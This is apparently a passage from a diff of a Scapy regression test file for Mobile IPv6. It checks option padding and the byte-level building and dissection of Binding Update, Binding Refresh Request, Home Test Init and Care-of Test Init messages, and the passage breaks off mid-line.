==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00' -a and b and c and d and e and g and h and i and j - - -############ -############ -+ Mobility Options - Automatic Padding - MIP6OptMNID -= Mobility Options - Automatic Padding - MIP6OptMNID -a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptMNID()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x08\x01\x01\x00' -b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptMNID()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x08\x01\x01' -c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptMNID()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x08\x01\x01\x01\x05\x00\x00\x00\x00\x00' -d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptMNID()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x08\x01\x01\x01\x04\x00\x00\x00\x00' -e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptMNID()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x08\x01\x01\x01\x03\x00\x00\x00' -g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptMNID()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x08\x01\x01\x01\x02\x00\x00' -h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptMNID()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x08\x01\x01\x01\x01\x00' -i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptMNID()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x08\x01\x01\x01\x00' -j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptMNID()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x08\x01\x01\x00' -a and b and c and d and e and g and h and i and j - - -############ -############ -+ Mobility Options - Automatic Padding - MIP6OptMsgAuth -= Mobility Options - Automatic Padding - MIP6OptMsgAuth -a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptMsgAuth()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\t\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA' -b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptMsgAuth()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\t\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA' -c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptMsgAuth()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x01\x01\x00\t\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA\x01\x02\x00\x00' -d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptMsgAuth()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x01\x00\t\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA\x01\x02\x00\x00' -e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptMsgAuth()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x00\t\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA\x01\x02\x00\x00' -g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptMsgAuth()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\t\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA\x01\x02\x00\x00' -h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptMsgAuth()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x01\x01\x00\t\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA' -i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptMsgAuth()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x01\x00\t\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA' -j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptMsgAuth()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x00\t\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA' -a and b and c and d and e and g and h and i and j - - -############ -############ -+ Mobility Options - Automatic Padding - MIP6OptReplayProtection -= Mobility Options - Automatic Padding - MIP6OptReplayProtection -a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptReplayProtection()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\n\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' -b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptReplayProtection()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x01\x03\x00\x00\x00\n\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' -c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptReplayProtection()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x01\x02\x00\x00\n\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' -d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptReplayProtection()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x01\x01\x00\n\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' -e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptReplayProtection()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x01\x00\n\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' -g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptReplayProtection()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x00\n\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' -h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptReplayProtection()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\n\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' -i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptReplayProtection()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\n\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' -j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptReplayProtection()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x01\x04\x00\x00\x00\x00\n\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' -a and b and c and d and e and g and h and i and j - - -############ -############ -+ Mobility Options - Automatic Padding - MIP6OptCGAParamsReq -= Mobility Options - Automatic Padding - MIP6OptCGAParamsReq -a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptCGAParamsReq()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x0b\x00\x01\x00' -b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptCGAParamsReq()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x0b\x00\x00' -c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptCGAParamsReq()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x0b\x00' -d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptCGAParamsReq()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x0b\x00\x01\x05\x00\x00\x00\x00\x00' -e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptCGAParamsReq()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x0b\x00\x01\x04\x00\x00\x00\x00' -g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptCGAParamsReq()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x0b\x00\x01\x03\x00\x00\x00' -h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptCGAParamsReq()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x0b\x00\x01\x02\x00\x00' -i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptCGAParamsReq()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x0b\x00\x01\x01\x00' -j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptCGAParamsReq()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x0b\x00\x01\x00' -a and b and c and d and e and g and h and i and j - - -############ -############ -+ Mobility Options - Automatic Padding - MIP6OptCGAParams -= Mobility Options - Automatic Padding - MIP6OptCGAParams -a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptCGAParams()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x0c\x00\x01\x00' -b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptCGAParams()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x0c\x00\x00' -c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptCGAParams()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x0c\x00' -d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptCGAParams()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x0c\x00\x01\x05\x00\x00\x00\x00\x00' -e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptCGAParams()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x0c\x00\x01\x04\x00\x00\x00\x00' -g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptCGAParams()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x0c\x00\x01\x03\x00\x00\x00' -h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptCGAParams()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x0c\x00\x01\x02\x00\x00' -i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptCGAParams()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x0c\x00\x01\x01\x00' -j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptCGAParams()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x0c\x00\x01\x00' -a and b and c and d and e and g and h and i and j - - -############ -############ -+ Mobility Options - Automatic Padding - MIP6OptSignature -= Mobility Options - Automatic Padding - MIP6OptSignature -a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptSignature()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\r\x00\x01\x00' -b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptSignature()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\r\x00\x00' -c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptSignature()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\r\x00' -d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptSignature()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\r\x00\x01\x05\x00\x00\x00\x00\x00' -e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptSignature()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\r\x00\x01\x04\x00\x00\x00\x00' -g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptSignature()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\r\x00\x01\x03\x00\x00\x00' -h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptSignature()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\r\x00\x01\x02\x00\x00' -i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptSignature()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\r\x00\x01\x01\x00' -j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptSignature()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\r\x00\x01\x00' -a and b and c and d and e and g and h and i and j - - -############ -############ -+ Mobility Options - Automatic Padding - MIP6OptHomeKeygenToken -= Mobility Options - Automatic Padding - MIP6OptHomeKeygenToken -a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptHomeKeygenToken()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x0e\x00\x01\x00' -b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptHomeKeygenToken()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x0e\x00\x00' -c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptHomeKeygenToken()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x0e\x00' -d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptHomeKeygenToken()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x0e\x00\x01\x05\x00\x00\x00\x00\x00' -e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptHomeKeygenToken()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x0e\x00\x01\x04\x00\x00\x00\x00' -g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptHomeKeygenToken()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x0e\x00\x01\x03\x00\x00\x00' -h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptHomeKeygenToken()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x0e\x00\x01\x02\x00\x00' -i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptHomeKeygenToken()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x0e\x00\x01\x01\x00' -j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptHomeKeygenToken()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x0e\x00\x01\x00' -a and b and c and d and e and g and h and i and j - - -############ -############ -+ Mobility Options - Automatic Padding - MIP6OptCareOfTestInit -= Mobility Options - Automatic Padding - MIP6OptCareOfTestInit -a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptCareOfTestInit()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x0f\x00\x01\x00' -b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptCareOfTestInit()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x0f\x00\x00' -c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptCareOfTestInit()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x0f\x00' -d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptCareOfTestInit()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x0f\x00\x01\x05\x00\x00\x00\x00\x00' -e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptCareOfTestInit()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x0f\x00\x01\x04\x00\x00\x00\x00' -g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptCareOfTestInit()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x0f\x00\x01\x03\x00\x00\x00' -h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptCareOfTestInit()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x0f\x00\x01\x02\x00\x00' -i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptCareOfTestInit()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x0f\x00\x01\x01\x00' -j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptCareOfTestInit()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x0f\x00\x01\x00' -a and b and c and d and e and g and h and i and j - - -############ -############ -+ Mobility Options - Automatic Padding - MIP6OptCareOfTest -= Mobility Options - Automatic Padding - MIP6OptCareOfTest -a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptCareOfTest()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00' -b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptCareOfTest()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00' -c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptCareOfTest()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00' -d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptCareOfTest()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00' -e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptCareOfTest()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x04\x00\x00\x00\x00' -g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptCareOfTest()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x00\x00' -h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptCareOfTest()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' -i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptCareOfTest()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01\x00' -j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptCareOfTest()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00' -a and b and c and d and e and g and h and i and j - - -############ -############ -+ Binding Refresh Request Message -= MIP6MH_BRR - Build (default values) -raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_BRR()) == b'`\x00\x00\x00\x00\x08\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x00\x00\x00h\xfb\x00\x00' - -= MIP6MH_BRR - Build with specific values -raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_BRR(nh=0xff, res=0xee, res2=0xaaaa, options=[MIP6OptLLAddr(), MIP6OptAltCoA()])) == b'`\x00\x00\x00\x00(\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\xff\x04\x00\xee\xec$\xaa\xaa\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= MIP6MH_BRR - Basic dissection -a=IPv6(b'`\x00\x00\x00\x00\x08\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x00\x00\x00h\xfb\x00\x00') -b=a.payload -a.nh == 135 and isinstance(b, MIP6MH_BRR) and b.nh == 59 and b.len == 0 and b.mhtype == 0 and b.res == 0 and b.cksum == 0x68fb and b.res2 == 0 and b.options == [] - -= MIP6MH_BRR - Dissection with specific values -a=IPv6(b'`\x00\x00\x00\x00(\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\xff\x04\x00\xee\xec$\xaa\xaa\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -b=a.payload -a.nh == 135 and isinstance(b, MIP6MH_BRR) and b.nh == 0xff and b.len == 4 and b.mhtype == 0 and b.res == 238 and b.cksum == 0xec24 and b.res2 == 43690 and len(b.options) == 3 and isinstance(b.options[0], MIP6OptLLAddr) and isinstance(b.options[1], PadN) and isinstance(b.options[2], MIP6OptAltCoA) - -= MIP6MH_BRR / MIP6MH_BU / MIP6MH_BA hashret() and answers() -hoa="2001:db8:9999::1" -coa="2001:db8:7777::1" -cn="2001:db8:8888::1" -ha="2001db8:6666::1" -a=IPv6(raw(IPv6(src=cn, dst=hoa)/MIP6MH_BRR())) -b=IPv6(raw(IPv6(src=coa, dst=cn)/IPv6ExtHdrDestOpt(options=HAO(hoa=hoa))/MIP6MH_BU(flags=0x01))) -b2=IPv6(raw(IPv6(src=coa, dst=cn)/IPv6ExtHdrDestOpt(options=HAO(hoa=hoa))/MIP6MH_BU(flags=~0x01))) -c=IPv6(raw(IPv6(src=cn, dst=coa)/IPv6ExtHdrRouting(type=2, addresses=[hoa])/MIP6MH_BA())) -b.answers(a) and not a.answers(b) and c.answers(b) and not b.answers(c) and not c.answers(b2) - -len(b[IPv6ExtHdrDestOpt].options) == 2 - - -############ -############ -+ Home Test Init Message - -= MIP6MH_HoTI - Build (default values) -raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_HoTI()) == b'`\x00\x00\x00\x00\x10\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x01\x01\x00g\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= MIP6MH_HoTI - Dissection (default values) -a=IPv6(b'`\x00\x00\x00\x00\x10\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x01\x01\x00g\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -b = a.payload -a.nh == 135 and isinstance(b, MIP6MH_HoTI) and b.nh==59 and b.mhtype == 1 and b.len== 1 and b.res == 0 and b.cksum == 0x67f2 and b.cookie == b'\x00'*8 - - -= MIP6MH_HoTI - Build (specific values) -raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_HoTI(res=0x77, cksum=0x8899, cookie=b"\xAA"*8)) == b'`\x00\x00\x00\x00\x10\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x01\x01w\x88\x99\x00\x00\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa' - -= MIP6MH_HoTI - Dissection (specific values) -a=IPv6(b'`\x00\x00\x00\x00\x10\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x01\x01w\x88\x99\x00\x00\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa') -b=a.payload -a.nh == 135 and isinstance(b, MIP6MH_HoTI) and b.nh==59 and b.mhtype == 1 and b.len == 1 and b.res == 0x77 and b.cksum == 0x8899 and b.cookie == b'\xAA'*8 - - -############ -############ -+ Care-of Test Init Message - -= MIP6MH_CoTI - Build (default values) -raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_CoTI()) == b'`\x00\x00\x00\x00\x10\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x01\x02\x00f\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= MIP6MH_CoTI - Dissection (default values) -a=IPv6(b'`\x00\x00\x00\x00\x10\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x01\x02\x00f\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -b = a.payload -a.nh == 135 and isinstance(b, MIP6MH_CoTI) and b.nh==59 and b.mhtype == 2 and b.len== 1 and b.res == 0 and b.cksum == 0x66f2 and b.cookie == b'\x00'*8 - -= MIP6MH_CoTI - Build (specific values) -raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/MIP6MH_CoTI(res=0x77, cksum=0x8899, cookie=b"\xAA"*8)) == b'`\x00\x00\x00\x00\x10\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x01\x02w\x88\x99\x00\x00\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa' - -= MIP6MH_CoTI - Dissection (specific values) -a=IPv6(b'`\x00\x00\x00\x00\x10\x87@ 